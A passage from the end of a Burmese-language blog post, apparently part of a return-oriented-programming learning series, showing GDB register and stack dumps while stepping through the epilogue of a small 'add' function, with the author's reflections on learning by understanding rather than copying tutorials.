ebp            0xffffd650       0xffffd650
esi            0xf7fc9000       -134443008
edi            0xf7fc9000       -134443008
eip            0x8048411        0x8048411 <add+6>
eflags         0x286    [ PF SF IF ]
cs             0x23     35
ss             0x2b     43
ds             0x2b     43
es             0x2b     43
fs             0x0      0
gs             0x63     99
0x08048411 in add ()
(gdb)
0xffffd650:     0x00000000      0x41414141      0x00000005      0x00000003
0xffffd660:     0x42424242      0xffffd654      0x00000000      0xf7e31637
0xffffd670:     0xf7fc9000      0xf7fc9000      0x00000000      0xf7e31637
0xffffd680:     0x00000001      0xffffd714      0xffffd71c      0x00000000
0xffffd690:     0x00000000      0x00000000      0xf7fc9000      0xf7ffdc04
0xffffd6a0:     0xf7ffd000      0x00000000      0xf7fc9000      0xf7fc9000
0xffffd6b0:     0x00000000      0xfb2060b9      0xc2a68ea9      0x00000000
0xffffd6c0:     0x00000000      0x00000000      0x00000001      0x08048310
=> 0x8048414 <add+9>:   mov    eax,DWORD PTR [ebp+0x8]
   0x8048417 <add+12>:  pop    ebp
eax            0x3      3
ecx            0xffffd654       -10668
edx            0xf7fca87c       -134436740
ebx            0x0      0
esp            0xffffd650       0xffffd650
ebp            0xffffd650       0xffffd650
esi            0xf7fc9000       -134443008
edi            0xf7fc9000       -134443008
eip            0x8048414        0x8048414 <add+9>
eflags         0x206    [ PF IF ]
cs             0x23     35
ss             0x2b     43
ds             0x2b     43
es             0x2b     43
fs             0x0      0
gs             0x63     99
0x08048414 in add ()
(gdb)
0xffffd650:     0x00000000      0x41414141      0x00000005      0x00000003
0xffffd660:     0x42424242      0xffffd654      0x00000000      0xf7e31637
0xffffd670:     0xf7fc9000      0xf7fc9000      0x00000000      0xf7e31637
0xffffd680:     0x00000001      0xffffd714      0xffffd71c      0x00000000
0xffffd690:     0x00000000      0x00000000      0xf7fc9000      0xf7ffdc04
0xffffd6a0:     0xf7ffd000      0x00000000      0xf7fc9000      0xf7fc9000
0xffffd6b0:     0x00000000      0xfb2060b9      0xc2a68ea9      0x00000000
0xffffd6c0:     0x00000000      0x00000000      0x00000001      0x08048310
=> 0x8048417 <add+12>:  pop    ebp
   0x8048418 <add+13>:  ret
eax            0x5      5
ecx            0xffffd654       -10668
edx            0xf7fca87c       -134436740
ebx            0x0      0
esp            0xffffd650       0xffffd650
ebp            0xffffd650       0xffffd650
esi            0xf7fc9000       -134443008
edi            0xf7fc9000       -134443008
eip            0x8048417        0x8048417 <add+12>
eflags         0x206    [ PF IF ]
cs             0x23     35
ss             0x2b     43
ds             0x2b     43
es             0x2b     43
fs             0x0      0
gs             0x63     99
0x08048417 in add ()
(gdb)
0xffffd654:     0x41414141      0x00000005      0x00000003      0x42424242
0xffffd664:     0xffffd654      0x00000000      0xf7e31637      0xf7fc9000
0xffffd674:     0xf7fc9000      0x00000000      0xf7e31637      0x00000001
0xffffd684:     0xffffd714      0xffffd71c      0x00000000      0x00000000
0xffffd694:     0x00000000      0xf7fc9000      0xf7ffdc04      0xf7ffd000
0xffffd6a4:     0x00000000      0xf7fc9000      0xf7fc9000      0x00000000
0xffffd6b4:     0xfb2060b9      0xc2a68ea9      0x00000000      0x00000000
0xffffd6c4:     0x00000000      0x00000001      0x08048310      0x00000000
=> 0x8048418 <add+13>:  ret
   0x8048419 <main>:    lea    ecx,[esp+0x4]
eax            0x5      5
ecx            0xffffd654       -10668
edx            0xf7fca87c       -134436740
ebx            0x0      0
esp            0xffffd654       0xffffd654
ebp            0x0      0x0
esi            0xf7fc9000       -134443008
edi            0xf7fc9000       -134443008
eip            0x8048418        0x8048418 <add+13>
eflags         0x206    [ PF IF ]
cs             0x23     35
ss             0x2b     43
ds             0x2b     43
es             0x2b     43
fs             0x0      0
gs             0x63     99
0x08048418 in add ()

ေနာက္ဆံုးေတာ့ eax ထဲမွာ 5 ပါလာခဲ့ျပီ ။ add function က return ျပန္လာတာျဖစ္တယ္။

ဒါကိုဘာလို႕ေရးတာလဲဆိုရင္ေတာ့ အရင္ lab ေတြနဲ႕မတူလို႕ပါပဲ ။ run ထားတာကေတာ့

root@exploitdev:~/ROP# uname -a
Linux exploitdev 4.4.0-116-generic #140-Ubuntu SMP Mon Feb 12 21:23:04 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux

ျပီးေတာ့ ေရွ႕ဆက္ဖို႕အတြက္ က်ေနာ္တို႕ Tutorial ေတြၾကည့္ျပီး သူတို႕ျပတဲ့အတိုင္းလိုက္ရိုက္ေနလို႕မရပါဘူး။ ကိုယ္တိုင္ဘာလဲဆိုတာသိဖို႕လိုအပ္ပါတယ္။ Liveoverflow ကိုေမးတဲ့အခါမွာ သူျပန္ေမးတဲ့ေမးခြန္းေလးေတြက ကိုယ္မေတြးမိတာ ကိုယ္မရေသးလို႕ဆိုတာသိသြားတယ္။

ဒါေၾကာင့္ က်ေနာ္ ကိုယ့္ဘာသာ ေသခ်ာနားလည္ေအာင္လုပ္ထားတာျဖစ္ပါတယ္။

ဒီလိုမ်ိဳးေလး နားလည္ေအာင္ လုပ္ေစခ်င္လို႕ပါ 😀 နည္းနည္းေတာ့ရွည္သြားတယ္ ကိုယ့္ဘာကိုလုပ္ရင္း မွားေနေတာ့မွ အမွားတိုင္းျပန္လိုက္ျပထားလို႕ျဖစ္ပါတယ္။

Thanks

 

1 Trackback / Pingback

  1. 0x0B -Undetstanding Return Oriented Programming – Legion of LOL

Comments are closed.